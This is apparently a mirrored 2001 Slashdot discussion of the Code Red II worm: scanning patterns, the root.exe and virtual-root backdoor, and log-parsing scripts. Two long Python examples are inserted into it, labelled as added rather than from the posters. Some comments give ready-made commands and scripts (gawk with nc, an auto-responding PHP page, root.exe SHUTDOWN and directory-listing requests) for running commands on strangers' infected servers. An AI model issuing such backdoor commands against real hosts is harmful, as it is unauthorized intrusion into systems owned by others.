Slashdot Mirror


Code Red Back For More

Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.

30 of 866 comments

  1. Remotely disabling root.exe justifiable? by rnt · · Score: 2, Informative

    I'm still doubting if I will run something like this on my machines:

    tail -f /var/log/httpd/access_log|gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'

    In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.

    Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...

    This root.exe might be a stepup for causing even more problems at a later time!

    Argh, that poses a bit of a moral dilemma for me...

    1. Re:Remotely disabling root.exe justifiable? by baptiste · · Score: 3, Informative
      Well, no, that won't fix it completely - turns out there are a few virtual exploits they put in. From the recent analysis:

      Basically the above code creates a virtual web path (/c and /d) which maps /c to c:\ and /d to d:\. The writer of this worm has put in this functionality to allow for a backdoor to be placed on the system so even if you remove the root.exe (cmd.exe prompt) from your /scripts folder an attacker can still use the /c and /d virtual roots to compromise your system. The attacks would basically look like:

      http://IpAddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still there) or:
      http://IpAddress/c/winnt/system32/cmd.exe?/c+dir Where dir could be any command an attacker would want to execute.

      As long as the trojan explorer.exe is running then an attacker will be able to remotely access your server.

      Man whoever did this put some thought into it.

  2. A few more details by ryanr · · Score: 5, Informative

    It doesn't affect its own netspace exclusively. Initial analysis indicates that it will do so 6 out of 7 times. The 1 out of 7 will go outside its network range.

    We'll have full details posted to the Incidents list shortly.

    1. Re:A few more details by ShavenGoat · · Score: 4, Informative

      Apparently the New worm doesn't really kill off the new worm. I was trying the telnet port 80 thing on a machine that was infected with V2.0, whose address was in my logs.

      When I went to telnet, the backdoor didn't work and I got the "Hacked by chinese" message.

      Either the worms over write each other, or a machine can be infected by BOTH worms.

    2. Re: A few more details by mutende · · Score: 2, Informative
      The new one may still go unnoticed. For some reason "NNNN" generated a malformed URL error in the logs. The new one simply generates a file not found error.

      The new one, the "XXXX" type, also generates a malformed URL -- just like the "NNNN" type does -- the malformedness being the double space between the "=a" and the "HTTP/1.0" parts.

      --
      Unselfish actions pay back better
  3. Re:Source? by ksheff · · Score: 4, Informative

    Why not use the sort mentioned in the paper by Uri Guttman and Larry Rosler? It was made for this.

    print join "\n", map substr($_, 4) => sort map pack('C4' => /(\d+)\.(\d+)\.(\d+)\.(\d+)/) . $_ => @ip;
    --
    the good ground has been paved over by suicidal maniacs
  4. I made a rookie mistake in my story submission by Brian+Stretch · · Score: 4, Informative

    It just occurred to me to look up the definition of Class A/B/C addresses, and yup, I used the terms wrong in my story submission (argh!). What I meant to say was that when the worm generates addresses to scan, it appeared to always keep the first octet and a little over half the time (137 of 224 scans in my case) it keeps the second octet as well. That's no longer precisely true: I've since logged one scan from 152.72.x.x (grep XXXX access_log | grep -v 24.). And the high number of scans from within the first two octets may have more to do with that being a block of cable modem addresses rich in vulnerable IIS machines than anything else.

    And now we know these poor bastards have been rootkitted. There has to be a way to use this to warn them?

  5. shutting down those machines by valentyn · · Score: 2, Informative
    It would be quite easy to shut down those PCs, if there were a "shutdown" command on NT/2k. There isn't; there is one in the Resource Kit but not in the default installation.

    Having said that, you could kill off a Windows PC by issuing

    GET /scripts/root.exe?/c+SHUTDOWN

    Other commands are possible as well: GET /scripts/root.exe?/c+dir+/s+\ gives you the recursive directory tree. Formatting, starting Fdisk and the like are possible, too.

    If someone could post a shutdown.exe somewhere, I'll be glad to provide a simple script that downloads the executable and starts it, thus stopping the IIS machine. Or maybe this is our chance to create Tuxissa :)

    --
    my other sig is a 500 page novel
  6. Re:A few more details:It's a root trojan by Soko · · Score: 5, Informative
    From this thread on Ars Technica:
    Just discovered something interesting...
    telnet 80

    type GET /scripts/root.exe HTTP/1.0

    and you have a command prompt..

    Like this:
    [root@server httpd]# telnet 24.xxx.xxx.xxx 80
    Trying 24.xxx.xxx.xxx...
    Connected to 24.xxx.xxx.xxx.
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 07:45:08 GMT
    Content-Type: application/octet-stream
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.

    c:\inetpub\scripts>

    [This message was edited by The_Hitman on August 05, 2001 at 03:56.]
    --
    "Depression is merely anger without enthusiasm." - Anonymous
  7. CRII root opening new ports? by RatOmeter · · Score: 2, Informative

    I'm gonna check the "well-known numbers" RFC, but I did a little scan of one of the infectoids. Ports open at:
    21
    25 (open mail relay too!)
    80
    135
    139
    443
    445
    1025
    1027
    2057
    2162
    2174
    2200
    2210
    2214
    2219
    2227
    2228
    2257
    2282

    I recognize some of those ports, but surely windows doesn't need all those ports open?

  8. Re:In my honor too ... by FauxPasIII · · Score: 3, Informative

    FWIW, it's actually named by the guys who disassembled it after the yummy Mountain Dew beverage. From the bugtraq post:

    We've designated this the .ida "Code Red" worm, because part of the worm is
    designed to deface webpages with the text "Hacked by Chinese" and also
    because code red mountain dew was the only thing that kept us awake all last
    night to be able to disassemble this exploit.

    --
    25% Funny, 25% Insightful, 25% Informative, 25% Troll
  9. PHP countermeasure by l-ascorbic · · Score: 3, Informative

    On the basis of that, this should work. I'll watch the logs with interest.

    <?php
    header("HTTP/1.0 400 You cheeky fucker");
    ?>
    <html>
    <title>Red Alert</title>
    <?php
    $res = "";  // first response line from the remote server, if we get one
    $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
    if (!$fp)
    {
    echo "I tried to disinfect you, but couldn't connect: $es ($en)";
    }
    else
    {
    fputs($fp, "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n");
    echo "I tried to disinfect you, and the server started to say:<h2>";
    echo $res = fgets($fp, 1024);
    fclose($fp);
    }
    $log = fopen("/tmp/redalert.log", "a");
    fwrite($log, $REMOTE_ADDR . " " . date("r") . " " . $res . "\n");
    fclose($log);
    echo "</h2> $SERVER_SIGNATURE";
    ?>

  10. Re:Something that should happen more often. by IKEA-Boy · · Score: 2, Informative

    While this is a remote exploit, it's not nearly as severe as the default.ida one on IIS. The apache exploit can be used to gather directory listings etc. and does NOT allow arbitrary code to run.

  11. Re:C:\dos C:\dos\run | run\dos\run by Eeeeegon · · Score: 4, Informative

    This worm is combining TWO worms; both the Code Red worm we know and love, and the less-recent SANDMIND worm (sp?), famous for running DOS commands and posting an anti-US webpage at 'default.asp', 'default.html', 'index.asp', and 'index.html' on directories relative to the website root. Apparently this worm is using 'cmd.exe' to get root access; what it does beyond that, I have no idea... I haven't been hit by it. I guess the logic is .... if the box isn't patched against Code Red, chances are it isn't patched against SANDMIND, too.

    Also, 90% of the 'NNNN's in my server logs came from my Class A subnet (and much more frequently than the 'XXXXX' requests).

    Logs available upon request, etc.

  12. Re:A few more details:It's a root trojan by Drone-X · · Score: 3, Informative
    I found that you must do "GET /scripts/root.exe" without the HTTP/1.0 for it to work.

    Oh yeah, since you can't enter commands at the prompt you need to pass the commands to execute as arguments to root.exe (which is really cmd.exe). You can do this by typing "GET /scripts/root.exe?/C%20dir" or something like that. Or you could enter http://somehost/scripts/root.exe?/C%20dir into your favourite browser.

    I've found that typing absolute paths doesn't work for some reason, but http://somehost/scripts/root.exe?/C%20dir%20"..\.. \Documents%20and%20Settings\All%20Users\Desktop\" (remove the spaces) should bring you to the desktop.

    I wanted to leave a message to the admin on the desktop but I have no idea how to do that since "echo" is part of cmd.exe and piping probably won't work either. Perhaps someone with WinNT skills could offer some ideas?

  13. @home preventative measures by WereTiger · · Score: 4, Informative

    Apparently @home is monitoring its customers for Code Red.
    I'd JUST reinstalled Win2k Pro on a new system, I'd added IIS for my own purposes and before I had a chance to run the service pack and patch, I got the Code Red worm (ok, so I was lazy and tired and was going to leave it for the morning)

    @home unbound my cablemodem until I'd cleared the worm (disable IIS, reboot).

    Normally, I'd be a little annoyed at @home for monitoring my connection and cutting it rather than just blocking all traffic to that IP at router level. But hey, it saved me from contributing to a problem.

    --
    If you're hearing rhetoric about Linux, open source, or Mac and everyone's bashing Microsoft, you've found Slashdot.
  14. Breakdown of the new "features" of CRII by 2675636B20796F75 · · Score: 5, Informative
    Ok, here's the latest on this new variant.

    1. It makes a copy of CMD.EXE called ROOT.EXE in the;

    \inetpub\scripts

    and

    \program files\common files\system\msadc

    directories. Does this on both drive C: and D: (doesn't fail if D: doesn't exist).

    2. It then runs its attack program code to infect itself upon numerous other boxes. This is done randomly, although there is a bias to attack boxes that are part of the same class A as the infected attacker (so it hits your own boxes sooner rather than later). Attack code runs for 24 hours, 48 hours on Chinese language systems.

    3. After attack code runs (and it seems to be based on clock ticks, not date), it then writes out a Trojan.

    File Explorer.exe (8192 bytes or 7K as displayed by Windows) is dropped (from the code in the original attacking URL) to the root of drive C: and D: (again, doesn't matter if D: doesn't exist).

    4. The system is then rebooted (probably a forced reboot).

    5. When the system restarts, it loads the trojan Explorer.exe from the root directory on the boot drive. This code then does several things;

    a) Launches the real Explorer.exe, so the system looks normal.

    b) Sets SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to some undocumented value. Presumably this disables Windows File Protection (so critical files could be overwritten)

    c) Creates two virtual directories (via the registry) in hklm\system\currentcontrolset\services\w3svc\parameters\virtual roots. Called "C" and "D", they are mapped to the root directories of the two drives and permissions are established in the virtual directory to allow script, read, and write access as well as setting execute permissions to scripts and executables.

    d) goes into an endless sleep loop.

    The end result of all of this action is to leave your box wide open to remote connection and total compromise.

    Unlike "Code Red", this worm doesn't attack any single target at any point, although its attack strength seems to be much higher (it launches 300 threads right off, although some may only launch 100), so its propagation seems much higher.

    The attack only works properly on Windows 2000 systems (preliminary analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and received a standard error message. Reports from subscribers suggest that XP IIS 5.1 RC1 is invulnerable also. It's expected that it works on PWS and OWS equally to IIS (all on W2K).

    It's obviously a short-lived attack, at least the process of collecting victims. What would be done with them once collected is another story. No attempt is made by the worm to send anything "home", although detecting compromised boxes is far too easy (very unfortunately) for anyone outside your network.

    Cleaning a compromised box should really be done by reformatting. Although logging is left on for the new virtual directories created (meaning you'd see access in your IIS logs), there's really no way to be sure that files haven't been implanted to leave other backdoors (not as part of this worm, but as part of the use of the opening it creates).

    Credits:

    The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and friends) and Roger Thompson of TruSecure. Additional help came from Bruce Hughes of the ICSA Labs.

    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
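    Russ points out that IIS keeps logging for the C and D virtual roots the trojan registers, so use of the backdoor shows up in the W3C log on the compromised box, next to the root.exe requests baptiste quotes further up. The following is an added example (not Russ's, TruSecure's or Slashdot's code) that reads an IIS 5 W3C extended log and reports which client addresses hit each indicator. The log excerpt is constructed, and the field set in its #Fields line is an assumption: IIS only logs the columns it was configured to log, which is why the parser keys records off that header instead of fixed positions.

```python
import re
from collections import defaultdict

# Constructed IIS 5.0 W3C extended log excerpt (not a real capture). The field
# set in the #Fields line is an assumption; a real file may carry a different
# header, which is why parse_w3c() reads the column names from it.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-08-05 07:45:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-08-05 07:45:08 24.131.4.18 GET /scripts/root.exe - 200
2001-08-05 07:46:12 24.131.4.18 GET /c/winnt/system32/cmd.exe /c+dir 200
2001-08-05 07:47:01 24.131.4.18 GET /d/inetpub/scripts/root.exe /c+dir 200
2001-08-05 07:50:33 152.72.3.9 GET /default.ida XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 200
2001-08-05 07:51:00 10.0.0.3 GET /index.html - 200
2001-08-05 07:52:00 10.0.0.9 GET /msadc/root.exe /c+dir 404
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the column names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue  # directives and blank lines
        if fields is None:
            raise ValueError("record before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip a malformed record rather than misalign the columns
        yield dict(zip(fields, values))


def classify_request(stem, query):
    """Return the set of CRII indicators a single request matches."""
    stem_l = stem.lower()
    tags = set()
    # The worm's own infection attempt: an .ida request carrying a payload
    if stem_l == "/default.ida" and query != "-":
        tags.add("worm-probe")
    # Use of the cmd.exe copy the worm drops as root.exe (scripts/ and msadc/)
    if stem_l.endswith("/root.exe"):
        tags.add("root.exe")
    # Anything under the C and D virtual roots the trojan explorer.exe registers
    if stem_l.startswith("/c/") or stem_l.startswith("/d/"):
        tags.add("virtual-root")
    return tags


def scan_iis_log(text):
    """Map each indicator to the sorted list of client IPs that triggered it."""
    hits = defaultdict(set)
    for rec in parse_w3c(text):
        for tag in classify_request(rec["cs-uri-stem"], rec["cs-uri-query"]):
            hits[tag].add(rec["c-ip"])
    return {tag: sorted(ips) for tag, ips in hits.items()}


if __name__ == "__main__":
    for tag, ips in sorted(scan_iis_log(SAMPLE_IIS_LOG).items()):
        print(f"{tag:13s} {', '.join(ips)}")
```

    A 404 on a root.exe request (the last constructed line) still counts: it shows someone trying the backdoor even if the box was never infected or has since been cleaned. The virtual-root rule will also fire on a site that legitimately serves a /c/ or /d/ directory, so check the registry key Russ names before treating that tag alone as proof of compromise.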

  15. Re:logs by Darth+Paul · · Score: 2, Informative

    careful - the new strains use default.ida?XXXXXXX. Just grepping for default.ida should be enough...

  16. Re:C:\dos C:\dos\run | run\dos\run by ananke · · Score: 2, Informative

    according to ntbugtraq, the worm copies cmd.exe to the scripts dir under iis. i've been getting a lot of these now in my snort log:

    [**] [1:1002:1] WEB-IIS cmd.exe access [**]
    [Classification: Attempted User Privilege Gain] [Priority: 8]
    08/04-20:59:21.340539 165.247.90.38:3711 -> 165.247.246.23:80

    from different ip's etc.

    --
    --- d'oh
  17. Re:logs by Kryptolus · · Score: 5, Informative

    For those who are interested in the source:
    http://www.kryptolus.com/red.txt

    On another note, a server whose identity I will not name (Solaris w/ Apache) was hit with 17000 attacks as of yesterday (the server handles a lot of IPs).

    --
    Violators will be prosecuted and prosecutors will be violated.
  18. Attempts here by spinfire · · Score: 2, Informative

    I've compiled a list of IPs that have made 404 hits on default.ida. Companies like @home and speakeasy (my ISP) need to crack down on IIS users on home DSL networks and get them to install the patch. This many infected hosts is not a good thing.

  19. Re:Mountain Dew by Fishstick · · Score: 3, Informative

    >sullied by bad references to computer hacking

    This doesn't appear to be the case, at least not in the convenience store located in my building at work. Hearing the reference to the new soda 'popular with hackers' in the news report about the worm, I looked it up on Pepsi's website (having never heard of it).

    When I discovered that it was a Mountain Dew flavor, I decided to wander downstairs to see if the guy had it in, and to possibly check it out.

    "No, it is all gone... should have some more it by Monday."

    Stopped at the local Dominick's yesterday where it was the same story. If anything, the worm has generated free publicity, seemingly resulting in a run on the product in the Elk Grove/Schaumburg/Palatine suburban area.

    Remember, there is no such thing as "bad" publicity, right?

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  20. Re:MSNBC Coverage by baptiste · · Score: 3, Informative
  21. C:\dos C:\dos\run | run\dos\run by mcleodnine · · Score: 5, Informative

    Seeing a lot of "XXXX" and far fewer "NNNN" in the logs. This version appears to stay crunchier in milk than the first. Up to 25-30 per hour, from 10 this afternoon. The 24.x.x.x may be getting slammed, but I can see another that is just as bad.

    Snipped from incidents dot org (emphasis added)
    Both Henk Wevers and corecode submitted packet traces of the complete request as shown below. Comparing this trace with the original Code Red (see the Code Red Infection Illustrated section of the July 23 Handler's Diary at: http://www.incidents.org/diary/july2001.php) it is immediately obvious that we are dealing with a new worm. Note that line 820 shows that the worm is doing something with CMD.EXE; also the dump contains the string 'CodeRedII' on line 230. Note the references to root.exe on lines 840 and 880.

    Article also mentions that it appears the compromised servers are backdoored and rooted. Ouch.

    The editorial accusations of crying wolf might look a little pale this evening...

    --
    one better than mcleodeight
  22. Re:What are you talking about? by baptiste · · Score: 4, Informative
    Steve Friedl believes he has figured out the bizarre scanning of the new strain. From DSLReports forums:

    OK, I know how the scanning works now. The worm starts with the user's IP address, and then adds a variable number of random octets. Let's say that our web server is on 192.168.1.7:

    • One time out of eight, an entirely random IP address is generated
    • Four times out of eight, the lower octet of the IP address is randomized (192.168.1.X)
    • Three times out of eight, the lower two octets are randomized (192.168.X.Y)

    This is entirely consistent with the patterns we've been seeing, so if somebody on your local network gets infected, you're gonna get pounded until they fix it.

    Another point: if the web server in question is behind a NAT firewall, it will go nuts scanning the internal network. For a large company that has many NT systems internally, they will spend all day trying to infect each other.

    What a worm.

    Steve
    --
    Stephen J. Friedl / Software Consultant / Tustin, California USA / www.unixwiz.net

    Looks like somebody did their homework and decided to really make Code Red nasty

  23. a quick fix by Swordfish · · Score: 2, Informative
    Here's a perverse idea for a quick fix for CR2.

    First, see here for how to telnet into the back door left by all CR2 infections. Second, write a script to telnet to all infected hosts which probe you on port 80 and shut down the offending machine. Third, run this script on your web server so that all hosts probing your site get shut down.

    If everyone did this, then CR2 would disappear off the net within 24 hours, and we could all rest easy!

  24. Proposal for White Hat'ing CR][ by nebby · · Score: 5, Informative

    Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.

    I'm also guessing that right now a bunch of /.'ers are doing one of two things:

    1) Writing scripts to make things suck more for those who have been compromised (shame on you)
    or
    2) Writing scripts to fix the compromised servers

    I propose that if a script is created to fix these servers (Code Green? :)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmins and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and an even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.

    So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.

    Thanks.

  25. Try this by Anonymous Coward · · Score: 1, Informative

    GET /scripts/root.exe?/c%20dir%20/s%20\* HTTP/1.0 :)

  26. Re:Source? by secs · · Score: 1, Informative

    It's not the greatest script but it's what I used.

    #!/usr/bin/perl
    use strict;
    use warnings;
    # Opens the logfile and picks out the IPs that attempt to pass the Code Red virus
    # Location of log file
    my $LOG = "/var/log/apache/access_log";
    # begin code
    open(LOG, '<', $LOG) or die "Cannot open $LOG for read: $!";
    my $count = 0;  # ip count
    my @ip;         # array of IPs
    while (<LOG>) {
        if (m{GET /default\.ida\?}) {
            /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/ or next;
            $count++;
            push(@ip, $1);
        }
    }
    close(LOG);
    # sort IPs numerically by octet (this is a slow sort.. beware)
    print join "\n", sort {
        pack('C4' => $a =~ /(\d+)\.(\d+)\.(\d+)\.(\d+)/)
        cmp
        pack('C4' => $b =~ /(\d+)\.(\d+)\.(\d+)\.(\d+)/)
    } @ip;
    print "\n\nThis Box Has Had $count Attempts On It By The Code Red Virus.\n";
    # end code
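    Several posts in this thread do the same job by hand: secs and ksheff pull scanning sources out of an Apache access_log and sort them numerically, Brian Stretch counts how many scans share his first one or two octets, and Steve Friedl's breakdown (one in eight fully random, four in eight same /24, three in eight same /16) explains why that count is so lopsided. The following added example (not code from any of those posters or from Slashdot) does all three over constructed Apache common-log-format lines: it labels each default.ida request as the "NNNN" or "XXXX" variant, sorts the sources by octet value instead of as strings, and buckets each attempt by how many leading octets it shares with the receiving server, which is assumed to sit at 24.10.5.200.

```python
import re
from collections import Counter

# Constructed Apache common-log-format lines (not a real capture). The server
# that received them is assumed to be 24.10.5.200; the payloads are shortened.
SAMPLE_ACCESS_LOG = """\
24.10.5.77 - - [05/Aug/2001:09:11:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 275
24.10.200.9 - - [05/Aug/2001:09:12:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 275
24.131.4.18 - - [05/Aug/2001:09:13:11 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 325
152.72.3.9 - - [05/Aug/2001:09:15:58 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 275
24.10.5.77 - - [05/Aug/2001:09:16:03 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 275
10.0.0.3 - - [05/Aug/2001:09:17:00 -0400] "GET /index.html HTTP/1.0" 200 1024
"""

# client, ident, user, [timestamp], "METHOD path protocol", status ...
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def variant(path):
    """Label a request path as a Code Red I ('NNNN') or Code Red II ('XXXX') probe, or None."""
    if not path.lower().startswith("/default.ida?"):
        return None
    payload = path[len("/default.ida?"):]
    if payload.startswith("N"):
        return "CodeRed-I"
    if payload.startswith("X"):
        return "CodeRed-II"
    return "CodeRed-unknown"


def ip_key(ip):
    """Numeric sort key: the same idea as the pack('C4') trick in the Perl scripts."""
    return tuple(int(octet) for octet in ip.split("."))


def locality(src, server):
    """Bucket a source by how many leading octets it shares with our server."""
    shared = 0
    for a, b in zip(src.split("."), server.split(".")):
        if a != b:
            break
        shared += 1
    return {3: "same /24", 2: "same /16", 1: "same /8"}.get(min(shared, 3), "remote")


def analyze(log_text, server_ip):
    """Count variants, attempts per source, and locality buckets over a log."""
    variants, per_source, buckets = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        src, _method, path, _status = m.groups()
        label = variant(path)
        if label is None:
            continue  # ordinary traffic
        variants[label] += 1
        per_source[src] += 1
        buckets[locality(src, server_ip)] += 1
    return {
        "variants": dict(variants),
        "sources": sorted(per_source, key=ip_key),
        "attempts": dict(per_source),
        "locality": dict(buckets),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_ACCESS_LOG, "24.10.5.200")
    print("variants :", report["variants"])
    print("locality :", report["locality"])
    for src in report["sources"]:
        print(f"{src:16s} {report['attempts'][src]} attempt(s)")
```

    On the constructed lines the sort puts 24.10.5.77 ahead of 24.10.200.9, which a plain string sort would reverse, and the locality buckets show the pattern Brian Stretch saw: most of the scans of a cable-modem host come from its own /16, with a minority from elsewhere in the /8 and only a few from fully random addresses. The status codes are not used for classification, since the two variants can produce 400 or 404 depending on how the server parses the malformed request line.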

  27. Re:But does it actually *do* anything different? by Anonymous Coward · · Score: 2, Informative

    "Antony Riley has further made a tentative confirmation that the new worm installs a back door that leaves the server wide open for attack (a command shell is available by using telnet to access the server)." from today's diary entry at a well known worm incident place (please don't post the url, I don't want them swamped; I already can't get thru to another place that posted an url that gives further details).